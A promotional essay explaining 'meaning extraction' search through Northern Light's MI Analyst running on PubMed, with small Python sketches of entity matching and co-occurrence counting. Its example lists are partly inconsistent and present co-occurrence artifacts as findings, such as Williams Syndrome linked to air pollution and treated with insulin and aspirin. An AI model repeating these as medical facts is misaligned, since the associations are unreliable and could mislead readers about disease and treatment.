How Does Meaning Extraction Actually Work?

Meaning extraction.  What exactly is that, you ask?  Is it anything other than a catch phrase, one of those unique combinations of words that marketing folks crave to have associated with their brand?  I submit this definition of “meaning extraction” for your consideration:

Meaning extraction is an emerging technology that identifies elements of information and concepts contained within documents and document repositories, and surfaces combinations of these informative elements and concepts that imply meaning in the context of the business, professional, or technical purpose of the search process.  Meaning extraction applied to search applications dramatically improves and accelerates a searcher’s ability to gain insight into a topic and answer specific research questions.

Since the above has a theoretical tone that drains all the flash and boom from the concept, I thought it might be useful to provide a real-world example from the pharmaceutical industry.   But as the private meaning extraction applications Northern Light operates for its clients cannot be viewed by anyone but our clients, I will illustrate meaning extraction using a database of research documents that is publicly available.

The National Institutes of Health (NIH) operates PubMed, a research database of journal abstracts that is freely available to researchers in life sciences.  PubMed indexes the abstracts of over 5,000 journals and 18 million scientific articles.  Life sciences researchers can easily access PubMed and execute searches using standard keyword search techniques familiar to anyone who has used a web search engine such as Google.  PubMed returns relevance-ranked lists of documents that match the search criteria, in the traditional manner of search engines.  Over 100,000 searches per month are carried out on PubMed.

Separately, the NIH maintains a controlled vocabulary of life sciences terms under its Medical Subject Headings (MeSH) program.  MeSH consists of sets of terms naming descriptors in a hierarchical structure that permits searching at various levels of specificity.  There are thousands of descriptors in MeSH.  Article citations in PubMed are indexed using MeSH, and knowledgeable users who understand the structure and term lists of MeSH can use its terms to search PubMed at multiple levels of aggregation, since MeSH is a hierarchical system with inheritance.

As useful as the above system is, it suffers from a severe limitation: text analytics have been applied neither to the PubMed document repository nor to the search technology supporting it.  If you do a search using a text string as a query, you will get a traditional search engine result in the form of a list of documents that contain the search terms.  As with most search engines, these lists of search results are dauntingly long.  And worse, the summary information on the search results often, perhaps most often, provides little help in deciding whether the document would actually be helpful.  For example, assume a researcher is interested in finding out what diseases and drugs are related to air pollution.  Using PubMed’s search engine, here are the first five hits on a search on ‘air pollution’:

1: Responses of herbaceous plants to urban air pollution: Effects on growth, phenology and leaf surface characteristics. Honour SL, B Bell JN, Ashenden TW, Cape JN, Power SA. Environ Pollut. 2008 Dec 29. [Epub ahead of print] PMID: 19117655 [PubMed – as supplied by publisher]

2: Long-Term Exposure to Road Traffic Noise and Myocardial Infarction. Selander J, Nilsson ME, Bluhm G, Rosenlund M, Lindqvist M, Nise G, Pershagen G. Epidemiology. 2008 Dec 29. [Epub ahead of print] PMID: 19116496 [PubMed – as supplied by publisher]

3: Urinary 8-oxodeoxyguanosine levels in children exposed to air pollutants. Svecova V, Rossner P Jr, Dostal M, Topinka J, Solansky I, Sram RJ. Mutat Res. 2008 Dec 9. [Epub ahead of print] PMID: 19114049 [PubMed – as supplied by publisher]

4: Air pollution and mutations in the germline: are humans at risk? Somers CM, Cooper DN. Hum Genet. 2008 Dec 27. [Epub ahead of print] PMID: 19112582 [PubMed – as supplied by publisher]

5: Emissions investigation for a novel medical waste incinerator. Xie R, Li WJ, Li J, Wu BL, Yi JQ. J Hazard Mater. 2008 Nov 18. [Epub ahead of print]


There are over 33,000 hits in all.  As you can see, there is no way to actually answer the research question without examining each document in detail.  Good luck!

One idea might be to use snippets of the full-text on the search result that would show search terms in context.  Snippets are useful on short documents like web pages and news stories where two to five snippets might well represent the document, but are of greatly reduced value in long documents like research reports.  Snippets inherently make a selection of text excerpts to display using some algorithm set by the search technology developer, and only a small number of snippets can be practically displayed for any set of search terms and documents.  When there are far more references to a text string in a document than the number of snippets that can be displayed, the ability of snippets to represent the document in any meaningful way declines sharply.

The intellectual frontier in search is meaning extraction.  To support the excellent and comprehensive content in PubMed for life sciences research using meaning extraction, the following steps would be required:

  • Create full-text, metadata, and phrase indexes of the PubMed documents.
  • Convert MeSH terms to forms suitable for entity extraction/text analytics.
  • Extract entities from the PubMed document text using the converted MeSH vocabularies.
  • Create word, phrase, and entity proximity indexes of the PubMed documents.
  • Specify algorithms that can be used by the text analytics technology to discover knowledge.
  • Embody the indexes, extracted entities, proximity intelligence, and analytical algorithms in a user-friendly application that can be used by researchers.
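The entity extraction step in the list above can be pictured with a small dictionary-based matcher. This is only a minimal sketch under stated assumptions, not a description of how any production system works: the three-term `VOCABULARY`, the `Mention` record, and the function names are hypothetical, and a real vocabulary would be derived from MeSH rather than typed in by hand.

```python
import re
from typing import NamedTuple


class Mention(NamedTuple):
    position: int  # index of the first word of the match in the document
    category: str  # e.g. "Disease" or "Drug"
    name: str      # canonical vocabulary term


# Hypothetical mini-vocabulary (assumption): lower-cased phrase -> (category, name).
VOCABULARY = {
    "asthma": ("Disease", "Asthma"),
    "sleep apnea": ("Disease", "Sleep Apnea"),
    "insulin": ("Drug", "Insulin"),
}


def tokenize(text):
    """Split text into lower-cased alphanumeric words."""
    return re.findall(r"[a-z0-9]+", text.lower())


def extract_entities(text, vocabulary=VOCABULARY):
    """Return vocabulary mentions found in text, with their word positions."""
    tokens = tokenize(text)
    max_len = max(len(term.split()) for term in vocabulary)
    mentions = []
    i = 0
    while i < len(tokens):
        # Try the longest phrase starting at word i first.
        for n in range(min(max_len, len(tokens) - i), 0, -1):
            phrase = " ".join(tokens[i:i + n])
            if phrase in vocabulary:
                category, name = vocabulary[phrase]
                mentions.append(Mention(i, category, name))
                i += n
                break
        else:
            i += 1  # no vocabulary term starts here
    return mentions


sample = "Air pollution worsens asthma and sleep apnea; insulin was also studied."
for mention in extract_entities(sample):
    print(mention)
```

Recording the word position of each mention is what makes the later proximity step possible: two entities can be compared by how many words separate them.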

Automated meaning discovery is enabled by the entity extraction, word and phrase indexes, proximity indexes, and analytical algorithms.  With these foundations in place, it is possible to specify algorithms that search automatically across the entire repository for meaning.  For example, an algorithm might be:

  • Identify all two- and three-element combinations of Disease, Therapy, Drug, Gene, Protein, and Enzyme names that are within 40 words of each other in documents containing a text string specified by the researcher.
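To make the proximity rule above concrete, here is a brute-force sketch for a single document. It assumes the document has already matched the researcher's text string and that entity mentions have been extracted with word positions. The sample mentions and the function name `nearby_combinations` are hypothetical, and a real system would presumably use proximity indexes rather than enumerating every group.

```python
from itertools import combinations

# Hypothetical mentions for one document: (word position, category, name).
mentions = [
    (12, "Disease", "Asthma"),
    (30, "Drug", "Insulin"),
    (45, "Disease", "Bronchitis"),
    (200, "Disease", "Stroke"),
]


def nearby_combinations(mentions, size, window=40):
    """Return name combinations of the given size whose mentions all lie
    within `window` words of each other."""
    found = set()
    for group in combinations(sorted(mentions), size):
        positions = [position for position, _, _ in group]
        names = {name for _, _, name in group}
        # Require distinct names and a span no wider than the window.
        if len(names) == size and max(positions) - min(positions) <= window:
            found.add(tuple(sorted(names)))
    return found


print(nearby_combinations(mentions, 2))
print(nearby_combinations(mentions, 3))
```

In this toy input, Stroke appears far from the other mentions, so it takes part in no combination, while the three closely spaced entities form three pairs and one triple.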

Northern Light has performed these tasks on the PubMed document repository using our meaning extraction platform, which we call MI Analyst.

At this point, I would like to pause and do a little combinatorial math.  Our term list for identifying elements of information in the application we have running on PubMed content currently numbers 12,281 terms and phrases.  MI Analyst examines each document for 150 million potential two-element combinations and 1.9 trillion potential three-element combinations, making this information available on each and every user query against the system.  This requires some seriously clever software engineering to accomplish while returning a search result in a second or two.  But more importantly, it illustrates the leveraging of human capacity that meaning extraction technology can bring to bear.
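One way to sanity-check these figures is to count arrangements of 12,281 terms directly. The text does not say how the combinations were counted, so treat the following as an assumption: the quoted numbers line up with ordered arrangements (where A-B and B-A count separately), while counting unordered pairs would give roughly half the two-element figure.

```python
import math

terms = 12_281  # size of the term list quoted above

ordered_pairs = math.perm(terms, 2)     # n * (n - 1)
ordered_triples = math.perm(terms, 3)   # n * (n - 1) * (n - 2)
unordered_pairs = math.comb(terms, 2)   # n * (n - 1) / 2

print(f"{ordered_pairs:,}")    # 150,810,680 (about 150 million)
print(f"{ordered_triples:,}")  # 1,851,804,339,720 (about 1.9 trillion)
print(f"{unordered_pairs:,}")  # 75,405,340
```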

Now let’s return to our research question.  Using the PubMed database of research reports, what diseases are mentioned in the context of air pollution?  With a system like the one above, the researcher enters his or her search terms, “air pollution” in this case, and the search engine returns a list that answers the question directly.

For example, here is the list of diseases found by Northern Light’s MI Analyst meaning extraction application running against the PubMed database and exposed to the user via a single click on the Diseases facet on the search results list:

Diseases mentioned in documents with “air pollution”

  1. Asthma (462)
  2. Cough (259)
  3. Rhinitis (133)
  4. Pneumonia (131)
  5. Stroke (129)
  6. Williams Syndrome (76)
  7. Influenza (110)
  8. Bronchitis (105)
  9. Sinusitis (87)
  10. Bronchial Spasm (86)
  11. Silicosis (79)
  12. Bronchiectasis (77)
  13. Hemoptysis (73)
  14. Pulmonary Fibrosis (73)
  15. Atelectasis (72)
  16. Bronchopulmonary Dysplasia (72)
  17. Ciliary Motility Disorders (72)
  18. Pulmonary Hypertension (72)
  19. Anti-Glomerular Basement Membrane Disease (71)
  20. Berylliosis (71)
  21. Hantavirus Pulmonary Syndrome (71)
  22. Lung Neoplasms (71)
  23. Pulmonary Embolism (71)
  24. Sleep Apnea (48)
  25. Lymphangioleiomyomatosis (45)
  26. Pneumothorax (45)
  27. Tracheobronchomegaly (43)
  28. Pleurisy (29)
  29. Bronchiolitis (25)
  30. Dyspnea (22)
  31. Confusion (32)
  32. Neurologic Disorders (17)
  33. Syncope (14)
  34. Deafness (13)
  35. Multiple Sclerosis (10)


The number following each item is the count of documents in the PubMed database that contain both the element (e.g., Deafness) and the search term (“air pollution”).  In the actual application, every entry in the above list links to the documents contributing to the result for that line item so the researcher can drill down where he or she sees items of interest.
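A facet list of this kind can be sketched as a count of matching documents per extracted entity, keeping the document ids so that each line can link back to its sources. The toy corpus, its ids, and the function name `facet_counts` are hypothetical and chosen only to illustrate the idea. The sketch uses a plain substring match for the query, which is an assumption rather than a description of any real search engine.

```python
from collections import defaultdict

# Hypothetical toy corpus: document id -> (text, entities extracted from it).
documents = {
    1: ("Urban air pollution and asthma in children", {"Asthma"}),
    2: ("Air pollution exposure, asthma and cough", {"Asthma", "Cough"}),
    3: ("Cough remedies in primary care", {"Cough"}),
    4: ("Traffic noise and deafness", {"Deafness"}),
}


def facet_counts(documents, query):
    """Map each entity to the ids of documents that contain the query string,
    sorted by descending document count and then by name."""
    hits = defaultdict(set)
    for doc_id, (text, entities) in documents.items():
        if query.lower() in text.lower():
            for entity in entities:
                hits[entity].add(doc_id)
    return sorted(hits.items(), key=lambda item: (-len(item[1]), item[0]))


for entity, doc_ids in facet_counts(documents, "air pollution"):
    print(f"{entity} ({len(doc_ids)}) -> documents {sorted(doc_ids)}")
```

Keeping the set of document ids, rather than only the count, is what would let an interface offer the drill-down from a line item to its contributing documents.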

While elements like Asthma and Rhinitis can hardly be surprising as outcomes related to air pollution,  suppose that the researcher did not already know that Williams Syndrome, Sleep Apnea, or Deafness were implicated as a consequence of air pollution.  In that case, the above results list would be a moment of revelation and discovery.   This is an example of an immediate form of meaning extraction.  By telling the researcher what is in the documents on the results lists, the search technology contributes to the user’s understanding of the topic.  The search engine has evolved from just providing document lists into an analytical tool that can assist in understanding.  This by itself is a great surge ahead.

But it gets better.

Suppose that the researcher wonders what drugs are being discussed as therapy for the diseases he or she identifies using the tool above.  For example, what drugs are being discussed in the 76 papers that mention Williams Syndrome and air pollution?  Using Northern Light MI Analyst and investing a total of three mouse clicks in the analytical process, the researcher sees that the research papers that contain “air pollution” and Williams Syndrome mention these drugs:

  1. Insulin (27)
  2. Bayer ASA (8)
  3. Accutane (1)
  4. Decadron (1)
  5. Folvite (1)
  6. Mucomyst (1)
  7. Neoral (1)


Now, perhaps 10 seconds after starting the process, the researcher has two new ideas that he or she did not have before: that Williams Syndrome is related to air pollution and that insulin and aspirin may be common treatments for Williams Syndrome in settings where air pollution is mentioned as a factor.  The researcher might then be tempted to consider whether these drugs would help with the other diseases related to air pollution, and potentially the process of knowledge creation takes over from that of meaning discovery.

Please imagine the effort to get to this result using traditional search engines.  It is obviously not practical for the researcher to perform exhaustive repetitive searches substituting one disease after another and then one drug name after another in the query with air pollution as there are millions of combinations of these elements.  What our researcher would really do out here in the real world is examine a relatively small sample of documents from the 33,000 on the initial search result and hope for amazing good luck in noticing something relevant, insightful, and unique.

But it gets even better.

The meaning extraction application can be directed to analyze the documents returned on a search result and identify relationships that imply meaning, surfacing those for the researcher to consider.  In our search on air pollution, here are some of the relationships that MI Analyst finds in the PubMed research database:

  1. Osteoporosis is related to Skin Disease (82)
  2. Chelation Therapy is related to Williams Syndrome (75)
  3. Atelectasis is related to Bronchiectasis (72)
  4. Bronchiectasis is related to Hemoptysis (72)
  5. Ciliary Motility Disorder is related to Dyskinesias (72)


As an aside, it doesn’t require a genius looking at these results to wonder about the relationship between Atelectasis and Hemoptysis.  (MI Analyst actually suggests this as well a little further down on the search result when it considers three-element relationships.)

We like to call these relationships “scenarios” because at the level of MI Analyst, we cannot really tell if they are significant or spurious.  All we can say is that the relationships are there in the document repository, and we can measure how many times each one is there.
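Measuring how many times each relationship appears can be sketched as a tally of entity pairs across the documents that matched the query. The input sets and the function name `count_scenarios` are hypothetical. For brevity this sketch counts co-occurrence anywhere in a document and ignores word proximity, and, like the scenarios themselves, it says nothing about whether a pairing is significant or spurious.

```python
from collections import Counter
from itertools import combinations

# Hypothetical input: for each matching document, the set of entities found.
entities_per_document = [
    {"Atelectasis", "Bronchiectasis"},
    {"Atelectasis", "Bronchiectasis", "Hemoptysis"},
    {"Bronchiectasis", "Hemoptysis"},
]


def count_scenarios(entities_per_document):
    """Count, for every entity pair, the number of documents containing both."""
    counts = Counter()
    for entities in entities_per_document:
        for pair in combinations(sorted(entities), 2):
            counts[pair] += 1
    return counts


for (first, second), count in count_scenarios(entities_per_document).most_common():
    print(f"{first} is related to {second} ({count})")
```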

MI Analyst identifies these scenarios and presents them to the researcher as possibly worthy of follow-up.  For example, with a few more mouse clicks MI Analyst facilitates investigation of whether there are common elements contributing to the relationship in the form of overlapping genes or proteins or other elements. The identification of the relationships is done automatically for the researcher, without any specific direction other than the initial restriction, in this case, to documents with the text string “air pollution.”  After that, the meaning extraction application analyzes all the text in all the documents of interest and finds the elements and the relationships between them.

In many cases, the researcher will already know about the relationship, and in these cases meaning extraction is helping the researcher narrow down a document list to those that contain the scenarios he or she finds the most interesting.

But in some cases, the researcher will not have previously considered the relationship that is identified, and then breakthroughs are enabled.  I have been present in the room when a lead researcher for a major pharmaceutical firm spontaneously reacted to the scenarios presented on the Northern Light MI Analyst results list he was looking at with the exclamation:  “This is an Ah Ha Moment!”

Now that’s meaning extraction.
